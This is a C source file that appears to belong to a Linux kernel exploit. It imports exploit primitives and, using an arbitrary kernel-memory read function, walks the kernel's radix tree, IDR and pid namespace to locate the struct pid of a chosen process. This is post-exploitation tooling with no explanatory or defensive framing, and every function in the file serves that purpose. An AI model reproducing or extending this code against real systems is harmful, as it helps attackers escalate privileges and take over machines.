#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
#include <sys/user.h>

#include "exploit_prims.h"
#include "kernel_helpers.h"

static inline unsigned long shift_maxindex(unsigned int shift)
{
    return (RADIX_TREE_MAP_SIZE << shift) - 1;
}

static inline unsigned long node_maxindex(const struct radix_tree_node *node)
{
    return shift_maxindex(node->shift);
}

static inline struct radix_tree_node *entry_to_node(void *ptr)
{
    return (void *)((unsigned long)ptr & ~RADIX_TREE_INTERNAL_NODE);
}

static inline bool radix_tree_is_internal_node(void *ptr)
{
    return ((unsigned long)ptr & RADIX_TREE_ENTRY_MASK) ==
                RADIX_TREE_INTERNAL_NODE;
}

static unsigned int radix_tree_descend(context* ctx, const struct radix_tree_node *parent,
            struct radix_tree_node **nodep, unsigned long index)
{
    unsigned int offset = 0;
    void **entry = NULL;
    struct radix_tree_node node_in = {0};

    kernel_read_bytes(ctx, (uint64_t)parent, (void*)&node_in, sizeof(node_in));
    offset = (index >> node_in.shift) & RADIX_TREE_MAP_MASK;

    entry = node_in.slots[offset];

    *nodep = (void *)entry;
    return offset;
}

static unsigned radix_tree_load_root(context* ctx, const struct radix_tree_root *root,
        struct radix_tree_node **nodep, unsigned long *maxindex)
{
    struct radix_tree_node *node = root->xa_head;
    struct radix_tree_node node_in = {0};
    *nodep = node;

    if (radix_tree_is_internal_node(node))
    {
        node = entry_to_node(node);
        kernel_read_bytes(ctx, (uint64_t)node, (void*)&node_in, sizeof(node_in));
        *maxindex = node_maxindex(&node_in);
        return node_in.shift + RADIX_TREE_MAP_SHIFT;
    }

    *maxindex = 0;
    return 0;
}

void *__radix_tree_lookup(context* ctx, const struct radix_tree_root *root,
              unsigned long index, struct radix_tree_node **nodep,
              void ***slotp)
{
    struct radix_tree_node *node, *parent;
    unsigned long maxindex;
    void **slot;
    struct radix_tree_node node_in = {0};

 restart:
    parent = NULL;
    slot = (void **)&root->xa_head;
    radix_tree_load_root(ctx, root, &node, &maxindex);

    if (index > maxindex)
        return NULL;

    while (radix_tree_is_internal_node(node)) {
        unsigned offset;

        parent = entry_to_node(node);
        offset = radix_tree_descend(ctx, parent, &node, index);
        kernel_read_bytes(ctx, (uint64_t)parent, (void*)&node_in, sizeof(node_in));
        slot = node_in.slots + offset;
        if (node == RADIX_TREE_RETRY)
            goto restart;
        if (node_in.shift == 0)
            break;
    }

    if (nodep)
        *nodep = parent;
    if (slotp)
        *slotp = slot;
    return node;
}

void *radix_tree_lookup(context* ctx, const struct radix_tree_root *root, unsigned long index)
{
    return __radix_tree_lookup(ctx, root, index, NULL, NULL);
}

void *idr_find(context* ctx, const struct idr *idr, unsigned long id)
{
    return radix_tree_lookup(ctx, &idr->idr_rt, id - idr->idr_base);
}

struct pid *find_pid_ns(context* ctx, int process_number)
{
    struct pid_namespace ns = {0};

    kernel_read_bytes(ctx, ctx->init_proc_ns_addr, (void*)&ns, sizeof(ns));

    return idr_find(ctx, &ns.idr, process_number);
}
